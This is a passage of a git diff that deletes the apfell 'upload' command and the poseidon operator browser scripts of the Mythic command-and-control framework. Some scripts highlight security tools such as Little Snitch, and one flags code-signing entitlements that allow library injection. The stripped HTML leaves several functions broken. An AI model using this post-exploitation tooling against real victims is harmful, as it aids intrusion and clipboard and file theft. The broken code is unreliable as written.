+0,0 @@ -from CommandBase import * -from MythicFileRPC import * -import json - - -class UploadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "file": CommandParameter( - name="file", type=ParameterType.File, description="file to upload" - ), - "remote_path": CommandParameter( - name="remote_path", - type=ParameterType.String, - description="/remote/path/on/victim.txt", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class UploadCommand(CommandBase): - cmd = "upload" - needs_admin = False - help_cmd = "upload" - description = ( - "Upload a file to the target machine by selecting a file from your computer. " - ) - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = True - author = "@its_a_feature_" - attackmapping = ["T1132", "T1030", "T1105"] - argument_class = UploadArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - original_file_name = json.loads(task.original_params)["file"] - response = await MythicFileRPC(task).register_file( - file=task.args.get_arg("file"), - saved_file_name=original_file_name, - delete_after_fetch=False, - ) - if response.status == MythicStatus.Success: - task.args.add_arg("file", response.agent_file_id) - else: - raise Exception("Error from Mythic: " + response.error_message) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/browser_scripts/clipboard.js b/Payload_Types/apfell/mythic/browser_scripts/clipboard.js deleted file mode 100644 index d71793074..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/clipboard.js +++ /dev/null @@ -1,30 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - } - try{ - if(responses[0]['response'] === "Successfully set the clipboard"){ - return "
 Successfully set the clipboard 
"; - } - let data = JSON.parse(responses[0]['response']); - let output = ""; - let key_list = []; - let specified = false; - for(const [key, value] of Object.entries(data)){ - key_list.push(escapeHTML(key)); - if(key === "public.utf8-plain-text"){ - output = escapeHTML(atob(value)); - }else if(value !== ""){ - specified = true; - } - } - if(specified){ - return "
All Keys: " + key_list.join(", ") + "\n" + escapeHTML(responses[0]['response']) + "
"; - }else{ - return "
All Keys: " + key_list.join(", ") + "\nPlaintext Data:\n" + escapeHTML(output) + "
"; - } - - }catch(error){ - return "
 Error: untoggle for parsing error message(s) 
"; - } -} \ No newline at end of file diff --git a/Payload_Types/apfell/mythic/browser_scripts/create_table.js b/Payload_Types/apfell/mythic/browser_scripts/create_table.js deleted file mode 100644 index de8d5ab49..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/create_table.js +++ /dev/null @@ -1,22 +0,0 @@ -function(headers, data){ - let output = ""; - output += ""; - for(let i = 0; i < headers.length; i++){ - output += ""; - } - output += ""; - for(let i = 0; i < data.length; i++){ - output += ""; - for(let j = 0; j < headers.length; j++){ - if(data[i]['cell-style'].hasOwnProperty(headers[j])){ - output += ""; - } - else{ - output += ""; - } - } - output += ""; - } - output += "
" + headers[i]['name'].toUpperCase() + "
" + data[i][headers[j]['name']] + "" + data[i][headers[j]['name']] + "
"; - return output; -} \ No newline at end of file diff --git a/Payload_Types/apfell/mythic/browser_scripts/download.js b/Payload_Types/apfell/mythic/browser_scripts/download.js deleted file mode 100644 index 717e099fc..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/download.js +++ /dev/null @@ -1,17 +0,0 @@ -function(task, responses){ - if(task.completed === true && task.status !== 'error'){ - try{ - let status = JSON.parse(responses[0]['response']); - if(status.hasOwnProperty('agent_file_id')){ - let file_name = status['filename']; - return "
Finished Downloading " + escapeHTML(file_name) + ". Click here to download
"; - } - }catch(error){ - return "
Error: " + error.toString() + "\n" + escapeHTML(JSON.stringify(responses, null, 2)) + "
"; - } - } - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - } - return "
 Downloading... 
"; -} diff --git a/Payload_Types/apfell/mythic/browser_scripts/list_apps.js b/Payload_Types/apfell/mythic/browser_scripts/list_apps.js deleted file mode 100644 index 89e2dc9bf..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/list_apps.js +++ /dev/null @@ -1,34 +0,0 @@ -function(task, response){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - } - let rows = []; - for(let i = 0; i < response.length; i++){ - try{ - let data = JSON.parse(response[i]['response']); - let row_style = ""; - let cell_style = {}; - Object.keys(data).forEach(function(x){ - let r = data[x]; - let row_style = ""; - if(r['name'].includes("1Password")){row_style="background-color:green;color:white"} - if(r['name'].includes("Term")){row_style="background-color:red;color:white"} - if(r['name'].includes("Snitch")){row_style="background-color:red;color:white"} - if(r['name'].includes("Slack")){row_style="background-color:blue;color:white"} - rows.push({"pid": escapeHTML(r['process_id']), - "name": escapeHTML(r['name']), - "arch": escapeHTML(r['architecture']), - "frontMost": escapeHTML(r['frontMost']), - "bin_path": escapeHTML(r['bin_path']), - "row-style": row_style, - "cell-style": {"hidden": "text-align:center", - "pid":"text-align:center"} - }); - }); - } - catch(error){ - "
Error: " + error.toString() + "\n" + escapeHTML(JSON.stringify(response, null, 2)) + "
"; - } - } - return support_scripts['apfell_create_table']([{"name":"pid","size":"2em"},{"name":"arch","size":"2em"},{"name":"name", "size":"10em"}, {"name":"frontMost","size":"3em"},{"name":"bin_path","size":"20em"}], rows); -} diff --git a/Payload_Types/apfell/mythic/browser_scripts/ls.js b/Payload_Types/apfell/mythic/browser_scripts/ls.js deleted file mode 100644 index 5e8216ea8..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/ls.js +++ /dev/null @@ -1,52 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - }else if(responses[0]['response'] === "added data to file browser"){ - return "
added data to file browser
"; - } - let rows = []; - try{ - for(let i = 0; i < responses.length; i++){ - let data = JSON.parse(responses[i]['response']); - let row_style = ""; - if( !data['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(data['name']), "size": escapeHTML(data['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = data['permissions']; - let xattr = []; - for(const [key, value] of Object.entries(perm_data)){ - if(key === "owner"){row['owner'] = escapeHTML(value);} - else if(key === "group"){row['group'] = escapeHTML(value);} - else if(key === "posix"){row['posix'] = escapeHTML(value);} - else if(key.includes(".")){xattr.push(escapeHTML(key))} - } - row['xattr'] = xattr.join("
"); - rows.push(row); - if(!data.hasOwnProperty('files')){data['files'] = []} - data['files'].forEach(function(r){ - let row_style = ""; - if( !r['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(r['name']), "size": escapeHTML(r['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = r['permissions']; - let xattr = []; - for(const [key, value] of Object.entries(perm_data)){ - if(key === "owner"){row['owner'] = escapeHTML(value);} - else if(key === "group"){row['group'] = escapeHTML(value);} - else if(key === "posix"){row['posix'] = escapeHTML(value);} - else if(key.includes(".")){xattr.push(escapeHTML(key))} - } - row['xattr'] = xattr.join("
"); - rows.push(row); - }); - } - return support_scripts['apfell_create_table']([ - {"name":"name", "size":"10em"}, - {"name":"size", "size":"2em"}, - {"name":"owner","size":"3em"}, - {"name":"group", "size": "2em"}, - {"name":"posix", "size":"2em"}, - {"name":"xattr", "size": "1em"}], rows); - }catch(error){ - console.log(error); - return "
 Error: untoggle for error message(s) 
"; - } -} \ No newline at end of file diff --git a/Payload_Types/apfell/mythic/browser_scripts/screenshot.js b/Payload_Types/apfell/mythic/browser_scripts/screenshot.js deleted file mode 100644 index 83854817f..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/screenshot.js +++ /dev/null @@ -1,20 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: Untoggle swtich to see error message(s) 
"; - } - if(task.completed){ - try{ - let status = JSON.parse(responses[0]['response']); - let id = status['agent_file_id']; - let output = "
"; - output += "
"; - output += "
" + element + "
"; - return output; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/create_process_additional_info_modal.js b/Payload_Types/poseidon/mythic/browser_scripts/create_process_additional_info_modal.js deleted file mode 100644 index ad5bfac65..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/create_process_additional_info_modal.js +++ /dev/null @@ -1,20 +0,0 @@ -function(uniqueName){ - let html = ` - - -`; - return html; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/create_table.js b/Payload_Types/poseidon/mythic/browser_scripts/create_table.js deleted file mode 100644 index 46191f464..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/create_table.js +++ /dev/null @@ -1,22 +0,0 @@ -function(headers, data){ - let output = ""; - output += ""; - for(let i = 0; i < headers.length; i++){ - output += ""; - } - output += ""; - for(let i = 0; i < data.length; i++){ - output += ""; - for(let j = 0; j < headers.length; j++){ - if(data[i]['cell-style'].hasOwnProperty(headers[j])){ - output += ""; - } - else{ - output += ""; - } - } - output += ""; - } - output += "
" + headers[i]['name'].toUpperCase() + "
" + data[i][headers[j]['name']] + "" + data[i][headers[j]['name']] + "
"; - return output; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/download.js b/Payload_Types/poseidon/mythic/browser_scripts/download.js deleted file mode 100644 index 87a876bb7..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/download.js +++ /dev/null @@ -1 +0,0 @@ -function(task, responses){ if(responses.length === 2){ try{ var status = JSON.parse(responses[0]['response']); }catch(error){ return JSON.stringify(JSON.parse(responses), null, 2);; } if(status.hasOwnProperty('id')){ return "
Finished Downloading " + escapeHTML(task['params']) + ". Click here to download
"; } } return JSON.stringify(JSON.parse(responses), null, 2); } \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/file_size_to_human_readable_string.js b/Payload_Types/poseidon/mythic/browser_scripts/file_size_to_human_readable_string.js deleted file mode 100644 index 763027863..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/file_size_to_human_readable_string.js +++ /dev/null @@ -1,14 +0,0 @@ -function(fileSize){ - var thresh = 1024; - if(Math.abs(fileSize) < thresh) { - return fileSize + ' B'; - } - var units = ['KB','MB','GB','TB','PB','EB','ZB','YB']; - var u = -1; - do { - fileSize /= thresh; - ++u; - } while(Math.abs(fileSize) >= thresh && u < units.length - 1); - return fileSize.toFixed(1)+' '+units[u]; - return output; -} \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/list_entitlements.js b/Payload_Types/poseidon/mythic/browser_scripts/list_entitlements.js deleted file mode 100644 index a211f1543..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/list_entitlements.js +++ /dev/null @@ -1,33 +0,0 @@ -function(task, responses){ - try{ - let ent = JSON.parse(responses[0]['response']); - let interesting = ["com.apple.security.cs.allow-jit", - "com.apple.security.cs.allow-unsigned-executable-memory", - "com.apple.security.cs.allow-dyld-environment-variables", - "com.apple.security.cs.disable-library-validation", - "com.apple.security.cs.disable-executable-page-protection", - "com.apple.security.cs.debugger", "No Entitlements"]; - let dict = {}; - for(let i = 0; i < ent.length; i++){ - if(ent[i]['code_sign'].toString(16).substring(1,2) !== "6"){ - dict[ent[i]['process_id']] = {}; - dict[ent[i]['process_id']]['bin_path'] = ent[i]['bin_path']; - dict[ent[i]['process_id']]['code_sign'] = "0x" + ent[i]['code_sign'].toString(16); - try{ - for(let j = 0; j < interesting.length; j++){ - if(ent[i]['entitlements'].includes(interesting[j])){ - dict[ent[i]['process_id']]['entitlements'] = JSON.parse(ent[i]['entitlements']); - break; - } - } - - }catch(err){ - dict[ent[i]['process_id']]['entitlements'] = ent[i]['entitlements']; - } - } - } - return "
" + escapeHTML(JSON.stringify(dict, null, 6)) + "
"; - }catch(error){ - return "
" + error.toString() + escapeHTML(JSON.stringify(responses, null, 6)) +  "
"; - } -} diff --git a/Payload_Types/poseidon/mythic/browser_scripts/ls.js b/Payload_Types/poseidon/mythic/browser_scripts/ls.js deleted file mode 100644 index 6487e66ee..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/ls.js +++ /dev/null @@ -1,36 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - }else if(responses[0]['response'] === "added data to file browser"){ - return "
added data to file browser
"; - } - let rows = []; - try{ - for(let i = 0; i < responses.length; i++){ - let data = JSON.parse(responses[i]['response']); - let row_style = ""; - if( !data['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(data['name']), "size": escapeHTML(data['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = data['permissions']; - row['permissions'] = escapeHTML(perm_data["permissions"]); - rows.push(row); - if(!data.hasOwnProperty('files')){data['files'] = []} - data['files'].forEach(function(r){ - let row_style = ""; - if( !r['is_file'] ){ row_style = "background-color: #5E28DC"} - let row = {"name": escapeHTML(r['name']), "size": escapeHTML(r['size']), "row-style": row_style, "cell-style": {}}; - let perm_data = r['permissions']; - perm_data = data['permissions']; - row['permissions'] = escapeHTML(perm_data["permissions"]); - rows.push(row); - }); - } - return support_scripts['poseidon_create_table']([ - {"name":"name", "size":"10em"}, - {"name":"size", "size":"2em"}, - {"name":"permissions","size":"3em"}], rows); - }catch(error){ - console.log(error); - return "
 Error: untoggle for error message(s) 
"; - } -} diff --git a/Payload_Types/poseidon/mythic/browser_scripts/portscan.js b/Payload_Types/poseidon/mythic/browser_scripts/portscan.js deleted file mode 100644 index 9ad2c99bb..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/portscan.js +++ /dev/null @@ -1 +0,0 @@ -function(task, response) { const capitalize = (s) => { if (typeof s !== 'string') return '' return s.charAt(0).toUpperCase() + s.slice(1) }; let total_output = ""; let total_results = ""; for (let i = 0; i < response.length; i++) { try { total_results += response[i]["response"]; } catch (error) { return response; } } let data = JSON.parse(total_results); for (let i = 0; i < data.length; i++) { let output = ""; let rows = []; let addedHeader = false; let headerDiv = '
' + escapeHTML(data[i]["range"]) + '
'; for (let j = 0; j < data[i]["hosts"].length; j++) { if (data[i]["hosts"][j]["open_ports"] != null) { if (!addedHeader) { output += headerDiv; addedHeader = true; } let host = data[i]["hosts"][j]; rows.push({ "Open Ports": escapeHTML(host["open_ports"].join(", ")), "Host": escapeHTML(host["pretty_name"]), "row-style": "", "cell-style": {} }); } } if (rows.length !== 0) { output += support_scripts['poseidon_create_table']([{ "name": "Open Ports", "size": "1em" }, { "name": "Host", "size": "1em" }], rows); output += "
"; total_output += output; } } return total_output; } \ No newline at end of file diff --git a/Payload_Types/poseidon/mythic/browser_scripts/ps.js b/Payload_Types/poseidon/mythic/browser_scripts/ps.js deleted file mode 100644 index 1acec8133..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/ps.js +++ /dev/null @@ -1,40 +0,0 @@ -function(task, response){ - let rows = []; - let uniqueName = task.id + "_additional_process_info_modal"; - for(let i = 0; i < response.length; i++){ - try{ - var data = JSON.parse(response[i]['response']); - }catch(error){ - return escapeHTML(response); - } - data.forEach(function(r){ - let row_style = ""; - if(r['name'].includes("Little Snitch")){ - row_style = "background-color:indianred;color:black;"; - }else if(r['bundleid'].includes("objective-see")){ - row_style = "background-color:indianred;color:black;"; - } - let additionalInfo = "
" + escapeHTML(JSON.stringify(r, null, 2)) + '
'; - rows.push({"pid": escapeHTML(r['process_id']), - "ppid": escapeHTML(r['parent_process_id']), - "path": escapeHTML(r['bin_path']), - "user": escapeHTML(r['user']), - "name": escapeHTML(r['name']), - "metadata": ' ', - "row-style": row_style, - "cell-style": {} - }); - }); - } - let output = support_scripts['poseidon_create_process_additional_info_modal'](escapeHTML(uniqueName)); - output += support_scripts['poseidon_create_table']( - [ - {"name":"pid", "size":"3em"}, - {"name":"pid", "size":"3em"}, - {"name": "name", "size": "10rem"}, - {"name": "user", "size": "10em"}, - {"name": "metadata", "size": "5rem"}, - {"name":"path", "size":""} - ], rows); - return output; -} diff --git a/Payload_Types/poseidon/mythic/browser_scripts/screencapture.js b/Payload_Types/poseidon/mythic/browser_scripts/screencapture.js deleted file mode 100644 index cc7aed093..000000000 --- a/Payload_Types/poseidon/mythic/browser_scripts/screencapture.js +++ /dev/null @@ -1,17 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){return "
 Error: Untoggle swtich to see error message(s) 
"; } - let output = ""; - for(let i = 0; i < responses.length; i+=2){ - if( i+1 < responses.length){ - //only want to do this if the next response exists, i.e. file_downloaded - let status = JSON.parse(responses[i]['response']); - let id = status['agent_file_id']; - output += "